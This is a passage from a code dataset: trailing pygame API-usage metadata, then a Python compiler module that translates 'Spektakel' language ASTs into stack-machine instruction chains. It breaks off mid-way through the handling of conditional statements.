"usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.USEREVENT", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 110, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 140, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 150, "usage_type": "attribute"}, 
{"api_name": "pygame.mixer.music.stop", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 152, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 153, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 159, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 159, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 163, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 166, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 166, "usage_type": "attribute"}]} +{"seq_id": "69991539050", "text": "import io\nfrom collections import namedtuple\n\nfrom engine.functional import terms\nfrom engine.functional.reference import ReturnValueReference, ExceptionReference, NameReference, FrameReference, \\\n AbsoluteFrameReference\nfrom engine.functional.terms import ComparisonOperator, BooleanBinaryOperator, TRef, UnaryOperator, Read, NewDict, \\\n NewProcedure, CTerm, Lookup, CString\nfrom engine.functional.values import VReturnError, VBreakError, VContinueError, VDict, VProcedure\nfrom engine.tasks.instructions import Push, Pop, Launch, Update, Guard, StackProgram, ProgramLocation\nfrom lang.translator import Translator\nfrom util import check_type\nfrom .ast import Pass, Constant, Identifier, Attribute, Tuple, Projection, Call, Launch, Await, Comparison, \\\n BooleanBinaryOperation, UnaryOperation, ArithmeticBinaryOperation, ImportNames, ImportSource, \\\n ExpressionStatement, Assignment, Block, Return, Raise, Break, \\\n Continue, Conditional, While, For, Try, VariableDeclaration, ProcedureDefinition, \\\n PropertyDefinition, ClassDefinition, AssignableExpression\nfrom ..modules import ModuleSpecification\n\n\ndef negate(bexp):\n return terms.UnaryOperation(UnaryOperator.NOT, bexp)\n\n\nclass Chain:\n \"\"\"\n Represents a sequence of instructions. 
Control flow can enter this chain only at its start.\n \"\"\"\n def __init__(self):\n self._proto = []\n self._targets = set()\n self._can_continue = True\n\n def __hash__(self):\n return hash(tuple(t for t, *_ in self._proto))\n\n def _equals(self, other, bijection=None):\n if bijection is None:\n bijection = {}\n if not (self._can_continue == other._can_continue and len(self._proto) == len(other._proto)):\n return False\n try:\n return bijection[self] is other\n except KeyError:\n bijection[self] = other\n for (t1, *args1), (t2, *args2) in zip(self._proto, other._proto):\n if t1 is not t2:\n return False\n for a1, a2 in zip(args1, args2):\n if isinstance(a1, Chain):\n if not a1._equals(a2, bijection=bijection):\n return False\n elif isinstance(a1, list):\n assert t1 is Update\n if tuple(a1) != tuple(a2):\n return False\n elif isinstance(a1, dict):\n assert t1 is Guard\n if len(a1) != len(a2):\n return False\n for k, v in a1.items():\n try:\n if v != a2[k]:\n return False\n except KeyError:\n return False\n else:\n if not a1 == a2:\n return False\n return False\n\n def __eq__(self, other):\n return isinstance(other, Chain) and self._equals(other)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __add__(self, other):\n if not isinstance(other, Chain):\n raise TypeError(\"Chains can only be extended by other chains!\")\n self._assert_continuable()\n s = Chain()\n s._proto = self._proto + other._proto\n s._targets = self._targets | other._targets\n s._can_continue = other._can_continue\n return s\n\n def __str__(self):\n t2s = {Update: \"Update\", Guard: \"Guard\", Push: \"Push\", Pop: \"Pop\", Launch: \"Launch\"}\n newline = \"\"\n with io.StringIO() as s:\n for t, *args in self._proto:\n s.write(newline)\n newline = \"\\n\"\n s.write(t2s[t])\n prefix = \": \"\n for a in args:\n s.write(prefix)\n s.write(str(a))\n prefix = \", \"\n return s.getvalue()\n\n def __len__(self):\n return len(self._proto)\n\n def _assert_continuable(self):\n if self._proto is None:\n raise RuntimeError(\"This chain has been finalized and cannot be modified anymore!\")\n if not self._can_continue:\n raise RuntimeError(\"This chain cannot be extended, because of the type of its last instruction!\")\n\n def append_update(self, ref, expression, on_error):\n \"\"\"\n Appends a prototype of an update instruction to this chain.\n :param ref: An Expression specifying which part of the state is to be updated.\n :param expression: The Expression object specifying how to compute the new value.\n :param on_error: The chain to jump to if the instruction causes an error.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Update, ref, expression, on_error))\n self._targets.add(on_error)\n\n def append_guard(self, alternatives, on_error):\n \"\"\"\n Appends a prototype of a guard instruction to this chain. 
The chain cannot be continued after a guard\n instruction.\n :param alternatives: A mapping from Expressions to Chains, specifying to which chain to jump under which\n condition.\n :param on_error: The chain to jump to in case the instruction causes an error.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Guard, alternatives, on_error))\n for _, t in alternatives.items():\n self._targets.add(t)\n self._targets.add(on_error)\n self._can_continue = False\n\n def append_jump(self, target):\n \"\"\"\n Appends a prototype of an unconditional jump instruction to this chain.\n The chain cannot be continued after this.\n :param target: The chain to jump to.\n \"\"\"\n # According to the semantics, there cannot be an error in evaluating Truth():\n self.append_guard({terms.CBool(True): target}, None)\n\n def append_push(self, entry, aexpressions, on_error):\n \"\"\"\n Appends a prototype of a Push instruction to this chain.\n :param entry: An Expression that evaluates to a ProgramLocation.\n :param aexpressions: An iterable of Expression objects that determine the values for the local variables that\n are to be pushed as part of the stack frame.\n :param on_error: The chain to jump to in case the instruction causes an error.\n Note that any errors caused as long as the newly pushed stack frame still exists will _not_\n lead to this error destination! To handle those errors, instructions following the push\n instruction must explicitly treat them!\n \"\"\"\n self._assert_continuable()\n self._proto.append((Push, entry, aexpressions, on_error))\n self._targets.add(on_error)\n\n def append_pop(self):\n \"\"\"\n Appends a prototype of a Pop instruction to this chain.\n The chain cannot be continued after a pop instruction.\n \"\"\"\n self._assert_continuable()\n self._proto.append((Pop, ))\n self._can_continue = False\n\n def append_launch(self, entry, aexpressions, on_error):\n \"\"\"\n Appends a prototype of a Launch instruction to this chain.\n :param entry: An Expression that evaluates to a ProgramLocation.\n :param aexpressions: An iterable of Expression objects that determine the values for the local variables that\n are to be pushed as part of the stack frame.\n :param on_error: The chain to jump to in case the instruction causes an error.\n Note that any errors caused as long as the newly pushed stack frame still exists will _not_\n lead to this error destination! 
To handle those errors, instructions following the push\n instruction must explicitly treat them!\n \"\"\"\n self._assert_continuable()\n self._proto.append((Launch, entry, aexpressions, on_error))\n self._targets.add(on_error)\n\n def compile(self):\n \"\"\"\n Compiles this chain and the chains it may jump to into a StackProgram.\n :return: A StackProgram object.\n \"\"\"\n\n offset = 0\n entries = {}\n chains = [self]\n\n while len(chains) > 0:\n c = chains.pop()\n if c in entries:\n continue\n entries[c] = offset\n offset += len(c)\n chains.extend((t for t in c._targets if t is not None))\n\n instructions = []\n offset = 0\n\n for c in entries.keys(): # Enumerates the chains in the order they were inserted, guaranteeing that they start\n # exactly at the recorded offsets.\n for t, *args in c._proto:\n\n if t is Pop:\n instructions.append(Pop())\n\n else:\n *args, on_error = args\n if on_error is None:\n on_error = -1\n else:\n on_error = entries[on_error]\n\n if t is Update:\n ref, expression = args\n instructions.append(Update(ref, expression, offset + 1, on_error))\n elif t is Guard:\n alternatives, = args\n instructions.append(Guard({condition: entries[chain] for condition, chain in alternatives.items()}, on_error))\n elif t is Push:\n entry, expressions = args\n instructions.append(Push(entry, expressions, offset + 1, on_error))\n elif t is Launch:\n entry, expressions = args\n instructions.append(Launch(entry, expressions, offset + 1, on_error))\n else:\n raise NotImplementedError(\"Bug in Chain.compile: The instruction type {} \"\n \"has not been taken into account for compilation yet!\".format(t))\n offset += 1\n\n if c._can_continue:\n instructions.append(Guard({}, offset))\n offset += 1\n\n return StackProgram(instructions)\n\n\nclass BlockStack:\n \"\"\"\n Models a stack to which information about syntactic blocks can be pushed during code generation.\n \"\"\"\n\n LoopBlock = namedtuple(\"LoopBlock\", (\"headChain\", \"successorChain\"))\n ExceptionBlock = namedtuple(\"ExceptionBlock\", (\"exceptionReference\", \"finallyChain\"))\n FunctionBlock = namedtuple(\"FunctionBlock\", (\"offset\", ))\n ClassBlock = namedtuple(\"ClassBlock\", (\"offset\", ))\n ModuleBlock = namedtuple(\"ModuleBlock\", (\"offset\", ))\n\n def __init__(self):\n super().__init__()\n self._entries = []\n\n def push(self, entry):\n \"\"\"\n Pushes an entry to the top of the stack.\n :param entry: The entry to push.\n \"\"\"\n self._entries.append(entry)\n\n def pop(self):\n \"\"\"\n Removes the latest entry from the stack.\n :return: The entry that was popped.\n \"\"\"\n return self._entries.pop()\n\n @property\n def top(self):\n \"\"\"\n The entry on the top of the stack.\n \"\"\"\n return self._entries[-1]\n\n def __getitem__(self, idx):\n return self._entries[idx]\n\n def __setitem__(self, key, value):\n self._entries[key] = value\n\n def __iter__(self):\n return reversed(self._entries)\n\n def __len__(self):\n return len(self._entries)\n\n\nclass Spektakel2Stack(Translator):\n \"\"\"\n A translator that translates Spektakel AST nodes into stack programs.\n \"\"\"\n\n def __init__(self, builtin):\n \"\"\"\n Initializes a new translator.\n :param builtin: An iterable of BuiltinModuleSpecification objects that define identifiers that are to be\n builtin, i.e. 
valid without any explicit definition or import.\n \"\"\"\n super().__init__()\n self._decl2ref = {} # Maps declaration nodes to references.\n self._blocks = BlockStack()\n self._import_procedure = None\n self._builtin = list(builtin)\n\n def declare_name(self, chain, name, on_error):\n \"\"\"\n Statically declares a new variable name. Depending on the context the name will be declared as a stack frame\n variable, or as a namespace entry. The new variable is recorded for the given declaration, such that it can\n easily be retrieved later.\n :param chain: The Chain to which the instructions for allocating the new variable should be appended.\n :param on_error: The Chain to which control should be transferred if the allocation code fails.\n :param name: Either an AST node, or a string, under which the reference generated by this call can be retrieved\n later. It may be None, in which case an anonymous local variable is allocated on the stack.\n :return: A Reference object that represents the newly allocated variable.\n \"\"\"\n\n blocks_iter = iter(self._blocks)\n\n try:\n idx, top = 0, next(blocks_iter)\n except StopIteration:\n raise Exception(\"Bug in create_local!\")\n\n if name is None:\n pass\n elif isinstance(name, str):\n pass\n elif isinstance(name, Identifier):\n name = name.name\n elif isinstance(name, ProcedureDefinition):\n name = name.name\n elif isinstance(name, PropertyDefinition):\n name = name.name\n elif isinstance(name, ClassDefinition):\n name = name.name\n else:\n raise TypeError(f\"Cannot declare names for objects of type {type(name)}!\")\n\n while True:\n if isinstance(top, BlockStack.FunctionBlock) \\\n or (name is None and isinstance(top, (BlockStack.ClassBlock, BlockStack.ModuleBlock))):\n # We are declaring a local variable in the stack frame (either for a function, or in a class/module\n # definition, in which an anonymous variable is needed).\n # The stack frame always has the same layout for all invocations of that function/declaration,\n # so we just add one more variable to that layout.\n offset = top.offset\n self._blocks[idx] = type(top)(offset + 1)\n r = FrameReference(offset)\n self._decl2ref[name] = r\n return r\n elif isinstance(top, (BlockStack.ClassBlock, BlockStack.ModuleBlock)):\n # We are declaring a class/module member. We know that the class/module definition code is\n # running under a stack frame that has a Namespace object at offset 0. That object needs to be extended.\n slot = FrameReference(0)\n r = NameReference(slot, name)\n chain.append_update(TRef(r), terms.CNone(), on_error)\n self._decl2ref[name] = r\n return r\n else:\n try:\n idx, top = idx + 1, next(blocks_iter)\n except StopIteration:\n raise Exception(\"Bug in create_local!\")\n\n def decl2ref(self, name):\n \"\"\"\n Retrieves the reference that was created for the given name.\n :param name: Either an AST node, or a string, for which declare_name has been called.\n :return: A Reference object.\n \"\"\"\n try:\n return self._decl2ref[name]\n except KeyError:\n if isinstance(name, Identifier):\n return self._decl2ref[name.name]\n raise\n\n def declare_pattern(self, chain, pattern, on_error):\n \"\"\"\n Statically declares new variable names for an entire pattern of names.\n Depending on the context the names will be declared as stack frame\n variables, or as a namespace entries. 
The new variables are recorded for the given pattern, such that they can\n easily be retrieved later.\n :param chain: The Chain to which the instructions for allocating the new variables should be appended.\n :param on_error: The Chain to which control should be transferred if the allocation code fails.\n :param pattern: The AssignableExpression node holding the pattern expression for which to allocate new variables.\n \"\"\"\n\n if isinstance(pattern, Identifier):\n self.declare_name(chain, pattern, on_error)\n elif isinstance(pattern, AssignableExpression):\n for c in pattern.children:\n self.declare_pattern(chain, c, on_error)\n else:\n raise TypeError(\"Patterns to be declared must only contain AssignableExpression nodes,\"\n \" not nodes of type {}!\".format(type(pattern)))\n\n def emit_assignment(self, chain, pattern, dec, expression, on_error, declaring=False):\n \"\"\"\n Emits VM code for a assigning the result of an expression evaluation to a pattern.\n :param chain: The chain to which the assignment should be appended.\n :param pattern: An AssignableExpression to which a value should be assigned.\n :param dec: A dict mapping AST nodes to decorations.\n :param expression: The expression the result of which is to be assigned.\n :param on_error: The chain that execution should jump to in case of an error.\n :param declaring: Specifies if this assignment is part of a declaration, in which case it is assumed that\n the given pattern is a *defining* occurrence of the declared name, not a *using* one.\n The difference between these cases is that *using* occurrences will be mapped to defining\n ones first, before the runtime reference for them can be retrieved.\n :return: The chain with which execution is to be continued after the call.\n \"\"\"\n\n # First we evaluate the expression:\n t, chain = self.translate_expression(chain, expression, dec, on_error)\n\n def assign(chain, pattern, t, on_error):\n if isinstance(pattern, Identifier):\n if not declaring:\n pattern = dec[pattern][1]\n r = self.decl2ref(pattern)\n chain.append_update(TRef(r), t, on_error)\n return chain\n elif isinstance(pattern, Tuple):\n # FIXME: What we are doing here will not work if t represents a general iterable! 
For that we would\n # need to call a procedure first that turns it into a sequence.\n for idx, c in enumerate(pattern.children):\n chain = assign(chain, c, terms.Project(t, terms.CInt(idx)), on_error)\n elif isinstance(pattern, Projection):\n callee, chain = self.translate_expression(chain, Attribute(pattern.value, \"__set_item__\"), dec, on_error)\n index, chain = self.translate_expression(chain, pattern.index, dec, on_error)\n return self.emit_call(chain, callee, [index, t], on_error)\n elif isinstance(pattern, Attribute):\n # Python's \"Descriptor How-To Guide\"\n # (https://docs.python.org/3/howto/descriptor.html#overview-of-descriptor-invocation)\n # lists the following procedure for attribute lookup:\n # def object_getattribute(obj, name):\n # \"Emulate PyObject_GenericGetAttr() in Objects/object.c\"\n # null = object()\n # objtype = type(obj)\n # cls_var = find_name_in_mro(objtype, name, null)\n # descr_get = getattr(type(cls_var), '__get__', null)\n # if descr_get is not null:\n # if (hasattr(type(cls_var), '__set__')\n # or hasattr(type(cls_var), '__delete__')):\n # return descr_get(cls_var, obj, objtype) # data descriptor\n # if hasattr(obj, '__dict__') and name in vars(obj):\n # return vars(obj)[name] # instance variable\n # if descr_get is not null:\n # return descr_get(cls_var, obj, objtype) # non-data descriptor\n # if cls_var is not null:\n # return cls_var # class variable\n # raise AttributeError(name)\n\n # We do not have general descriptors, but we have properties (which are data descriptors) and we have\n # methods (which are non-data descriptors). Hence for us the procedure above becomes this:\n\n a, chain = self.translate_expression(chain, pattern.value, dec, on_error)\n\n r = self.declare_name(chain, None, on_error)\n chain.append_update(r, terms.StoreAttrCase(a, pattern.name), on_error)\n\n csetter = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISCALLABLE, r)\n cexception = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISEXCEPTION, r)\n cupdate = ~(csetter | cexception)\n\n setter = Chain()\n update = Chain()\n exception = Chain()\n successor = Chain()\n chain.append_guard({csetter: setter, cupdate: update, cexception: exception}, on_error)\n\n self.emit_call(setter, r, [t], on_error)\n setter.append_jump(successor)\n\n update.append_update(r, t, on_error)\n update.append_jump(successor)\n\n exception.append_update(ExceptionReference(), r, on_error)\n exception.append_jump(on_error)\n\n return successor\n\n # TODO: Implement this for 'super', see https://docs.python.org/3/howto/descriptor.html#invocation-from-super\n # and https://www.python.org/download/releases/2.2.3/descrintro/#cooperation\n elif isinstance(pattern, AssignableExpression):\n raise NotImplementedError(\"Assignment to patterns of type {} \"\n \"has not been implemented yet!\".format(type(pattern)))\n else:\n raise TypeError(\"The pattern to which a value is assigned must be an \"\n \"AssignableExpression, not a {}!\".format(type(pattern)))\n\n return assign(chain, pattern, t, on_error)\n\n def emit_import(self, chain, spec, subnames, name, mapping, on_error):\n \"\"\"\n Emits code for an import.\n :param chain: The chain to which the import should be appended.\n :param spec: The ModuleSpecification for the module to import.\n :param name: The name the imported module should be bound to, unless the name is None.\n :param subnames: The chain of submodule names to follow from the root module. 
This must be an iterable of\n strings, that can be empty.\n :param mapping: A mapping from string names to be defined by this import statement to string names defined\n in the imported module.\n :param on_error: The chain that execution should jump to in case of an error.\n :return: The chain with which execution is to be continued after the call.\n \"\"\"\n\n check_type(spec, ModuleSpecification)\n\n module = spec.resolve()\n\n m, chain = self.emit_call(chain, CTerm(self._import_procedure),\n [CTerm(ProgramLocation(module, 0))], on_error)\n\n m = TRef(m)\n\n for a in subnames:\n m = terms.Lookup(m, CString(a))\n\n if name is not None:\n chain.append_update(TRef(self.declare_name(chain, name, on_error)), m, on_error)\n\n for name, member in mapping.items():\n chain.append_update(TRef(self.declare_name(chain, name, on_error)), Lookup(m, CString(member)), on_error)\n\n return chain\n\n def emit_call(self, chain, callee, args, on_error):\n \"\"\"\n Emits VM code for a procedure call.\n :param chain: The chain to which the call should be appended.\n :param callee: A Term object representing the procedure to be called.\n :param args: An iterable of term objects representing the arguments to the call.\n :param on_error: The chain that execution should jump to in case of an error.\n :return: A pair (t, c), where t is the term representing the return value of the call and c is the chain\n in which execution is to be continued after the call.\n \"\"\"\n\n # Make sure that the right number of arguments is being used:\n call = Chain()\n argc_error = Chain()\n argc_error.append_update(TRef(ExceptionReference()), terms.NewTypeError(\"Wrong number of arguments for call!\"), on_error)\n argc_error.append_jump(on_error)\n match = terms.Comparison(ComparisonOperator.EQ, terms.NumArgs(callee), terms.CInt(len(args)))\n chain.append_guard({match: call, negate(match): argc_error}, on_error)\n\n call.append_push(callee, args, on_error)\n\n successor = Chain()\n noerror = terms.Comparison(ComparisonOperator.EQ, terms.Read(TRef(ExceptionReference())), terms.CNone())\n call.append_guard({negate(noerror): on_error, noerror: successor}, on_error)\n\n rv = self.declare_name(successor, None, on_error)\n rr = ReturnValueReference()\n successor.append_update(TRef(rv), terms.Read(TRef(rr)), on_error)\n return rv, successor\n\n def translate_expression(self, chain, node, dec, on_error):\n \"\"\"\n Translates an AST expression into a machine expression.\n :param node: An AST node representing an expression.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A pair (t, c), where t is the term representing the result of expression evaluation and c is the chain\n in which execution is to be continued after evaluation of the expression.\n \"\"\"\n\n if isinstance(node, Constant):\n value = dec[node]\n if isinstance(value, bool):\n return (terms.CBool(True) if value == True else terms.CBool(False)), chain\n elif isinstance(value, str):\n return terms.CString(value), chain\n elif value is None:\n return terms.CNone(), chain\n elif isinstance(value, int):\n return terms.CInt(value), chain\n elif isinstance(value, float):\n return terms.CFloat(value), chain\n else:\n raise NotImplementedError(\"Translation of constant expressions of type {}\"\n \" has not been implemented!\".format(type(value)))\n elif isinstance(node, Identifier):\n return Read(CTerm(self.decl2ref(dec[node][1]))), chain\n elif isinstance(node, Attribute):\n v, chain = self.translate_expression(chain, node.value, dec, on_error)\n\n r = 
self.declare_name(chain, None, on_error)\n chain.append_update(r, terms.LoadAttrCase(v, node.name), on_error)\n\n cgetter = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISGETTER, r)\n\n getter = Chain()\n successor = Chain()\n chain.append_guard({cgetter: getter, ~cgetter: successor}, on_error)\n\n v, getter = self.emit_call(getter, r, [], on_error)\n getter.append_update(r, v, on_error)\n getter.append_jump(successor)\n\n return r, successor\n\n # TODO: Implement this for 'super', see https://docs.python.org/3/howto/descriptor.html#invocation-from-super\n # and https://www.python.org/download/releases/2.2.3/descrintro/#cooperation\n elif isinstance(node, Call):\n args = []\n for a in node.arguments:\n v, chain = self.translate_expression(chain, a, dec, on_error)\n args.append(v)\n\n callee, chain = self.translate_expression(chain, node.callee, dec, on_error)\n return self.emit_call(chain, callee, args, on_error)\n elif isinstance(node, Launch):\n args = []\n for a in node.arguments:\n v, chain = self.translate_expression(chain, a, dec, on_error)\n args.append(v)\n callee, chain = self.translate_expression(chain, node.callee, dec, on_error)\n chain.append_launch(callee, args, on_error)\n t = self.declare_name(chain, None, on_error)\n chain.append_update(t, terms.Read(ReturnValueReference()), on_error)\n return t, chain\n elif isinstance(node, Await):\n t = self.translate_expression(chain, node.process, dec, on_error)\n successor = Chain()\n complete = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISTERMINATED, t)\n chain.append_guard({complete: successor}, on_error)\n\n successor = Chain()\n noerror = terms.Comparison(ComparisonOperator.EQ, terms.Read(ExceptionReference()), terms.CNone())\n chain.append_guard({~noerror: on_error, noerror: successor}, on_error)\n\n rv = self.declare_name(successor, None, on_error)\n rr = ReturnValueReference()\n successor.append_update(rv, terms.Read(rr), on_error)\n successor.append_update(rr, terms.CNone(), on_error)\n return rv, successor\n elif isinstance(node, Projection):\n idx, chain = self.translate_expression(chain, node.index, dec, on_error)\n v, chain = self.translate_expression(chain, node.value, dec, on_error)\n callee, chain = self.translate_expression(chain, Attribute(v, \"__get_item__\"), dec, on_error)\n return self.emit_call(chain, callee, [idx], on_error)\n elif isinstance(node, UnaryOperation):\n return terms.UnaryOperation(node.operator, self.translate_expression(chain, node.operand, dec, on_error)), chain\n elif isinstance(node, ArithmeticBinaryOperation):\n left, chain = self.translate_expression(chain, node.left, dec, on_error)\n right, chain = self.translate_expression(chain, node.right, dec, on_error)\n return terms.ArithmeticBinaryOperation(node.operator, left, right), chain\n elif isinstance(node, Comparison):\n return terms.Comparison(node.operator,\n self.translate_expression(chain, node.left, dec, on_error),\n self.translate_expression(chain, node.right, dec, on_error)), chain\n elif isinstance(node, BooleanBinaryOperation):\n # Note: Like in Python, we want AND and OR to be short-circuited. 
This means that we require some control\n # flow in order to possibly skip the evaluation of the right operand.\n\n v = self.declare_name(chain, None, on_error)\n left, chain = self.translate_expression(chain, node.left, dec, on_error)\n chain.append_update(v, left, on_error)\n\n rest = Chain()\n successor = Chain()\n\n if node.operator == BooleanBinaryOperator.AND:\n skip = ~terms.Read(v)\n elif node.operator == BooleanBinaryOperator.OR:\n skip = terms.Read(v)\n else:\n skip = terms.CBool(False)\n\n chain.append_guard({skip: successor, ~skip: rest})\n\n right, rest = self.translate_expression(rest, node.right, dec, on_error)\n chain.append_update(v, terms.BooleanBinaryOperation(node.operator, terms.Read(v), right), on_error)\n chain.append_jump(successor)\n return terms.Read(v), successor\n elif isinstance(node, Tuple):\n return terms.NewTuple(*(self.translate_expression(chain, c, dec, on_error) for c in node.children)), chain\n else:\n raise NotImplementedError()\n\n def emit_return(self, on_error, chain=None):\n \"\"\"\n Emits code for a return statement, under the assumption that the return value has already been set for the task.\n :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or arrive at the function body:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VReturnError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.FunctionBlock):\n break\n\n # We made it to the function level without hitting an exception block.\n chain.append_update(TRef(ExceptionReference()), terms.CNone(), on_error=on_error)\n chain.append_pop()\n\n return chain\n\n def emit_break(self, on_error, chain=None):\n \"\"\"\n Emits code for a break statement.\n :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or a loop:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VBreakError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.LoopBlock):\n chain.append_update(ExceptionReference(), terms.CNone(), on_error=on_error)\n chain.append_jump(entry.successorChain)\n return chain\n\n raise AssertionError(\"This code location must never be reached,\"\n \" because break statements cannot be emitted outside loops!\")\n\n def emit_continue(self, on_error, chain=None):\n \"\"\"\n Emits code for a continue statement.\n :param chain: The chain to emit the code to. 
If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or a loop:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VContinueError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.LoopBlock):\n chain.append_update(ExceptionReference(), terms.CNone(), on_error=on_error)\n chain.append_jump(entry.headChain)\n return chain\n\n raise AssertionError(\"This code location must never be reached,\"\n \" because break statements cannot be emitted outside loops!\")\n\n def _emit_procedure(self, chain, name, argnames, body, dec, on_error):\n \"\"\"\n Emits code for a procedure declaration.\n :param name: The AST node representing the name of the procedure.\n :param argnames: A tuple of AST nodes representing the argument names of the procedure.\n :param body: The AST node representing the body of the procedure.\n :param dec:\n :param on_error:\n :return: A pair (v, c), where v is a Term representing the procedure object and c is the chain to which code\n following the procedure definition can be appended.\n \"\"\"\n\n bodyBlock = Chain()\n exitBlock = Chain()\n\n num_args = len(argnames)\n\n self._blocks.push(BlockStack.FunctionBlock(0))\n\n # Declare the function arguments as local variables:\n for aname in argnames:\n self.declare_pattern(bodyBlock, aname, on_error)\n\n body = self.translate_statement(bodyBlock, body, dec, exitBlock)\n body.append_pop()\n\n exitBlock.append_pop()\n\n # TODO (later): The function definition might be nested in another one.\n # Since it might \"escape\" the enclosing function, the variables that are shared between\n # the functions cannot be allocated on the stack.\n # Those variables that are shared must be allocated in a \"Heap frame\", the pointer to which\n # is part of the Function object that is constructed (IT CANNOT BE PASSED AS AN ARGUMENT!\n # REASON: The function object is not being called here, but later,\n # by some other code that receives the function object!)\n # The compilation of the inner function\n # must thus map the shared variables to offsets in the heap frame.\n # --> For now we should just *detect* nonlocal variables and raise a NotImplementedError\n\n f = terms.NewProcedure(num_args, body.compile())\n\n self._blocks.pop()\n\n if name is None:\n return f, chain\n else:\n name = self.declare_pattern(chain, name, on_error)\n chain = chain.append_update(name, f, on_error)\n return name, chain\n\n def translate_statement(self, chain, node, dec, on_error):\n \"\"\"\n Translates a statement into a StackProgram.\n :param chain: The chain to which to append the translation of the statement.\n :param node: An AST node representing a Statement.\n :param dec: A dict mapping AST nodes to decorations.\n :param on_error: The chain to jump to in case an (unhandled) error occurs during the execution of the translated\n statement.\n :return: A Chain object that the instructions resulting from the translation of the statement will jump to\n after completing the execution of the statement.\n \"\"\"\n\n if isinstance(node, Pass):\n pass\n elif isinstance(node, ExpressionStatement):\n _, chain = self.translate_expression(chain, 
node.expression, dec, on_error)\n # The previous line generated code for any side effects of the expression.\n # We do not really need to use the expression itself,\n # because its evaluation result is not to be bound to anything.\n return chain\n elif isinstance(node, Assignment):\n chain = self.emit_assignment(chain, node.target, dec, node.value, on_error)\n return chain\n elif isinstance(node, Block):\n for s in node.children:\n chain = self.translate_statement(chain, s, dec, on_error)\n return chain\n elif isinstance(node, Return):\n if node.value is not None:\n r, chain = self.translate_expression(chain, node.value, dec, on_error)\n chain.append_update(ReturnValueReference(), r, on_error)\n self.emit_return(on_error, chain)\n return Chain()\n elif isinstance(node, Raise):\n if node.value is None:\n found = False\n # Walk over the block stack (\"outwards\") to find the exception block this re-raise is contained in.\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.Read(entry.exceptionVariable), on_error=on_error)\n found = True\n if not found:\n raise AssertionError(\n \"A raise statement without an expression should not occur outside a try block!\")\n else:\n e, chain = self.translate_expression(chain, node.value, dec, on_error)\n chain.append_update(ExceptionReference(), e, on_error)\n chain.append_jump(on_error)\n return Chain()\n elif isinstance(node, Break):\n self.emit_break(on_error, chain)\n return Chain()\n elif isinstance(node, Continue):\n self.emit_continue(on_error, chain)\n return Chain()\n elif isinstance(node, Conditional):\n consequence = Chain()\n alternative = Chain()\n successor = Chain()\n condition, chain = self.translate_expression(chain, node.condition, dec, on_error)\n chain.append_guard({condition: consequence, ~condition: alternative}, on_error)\n 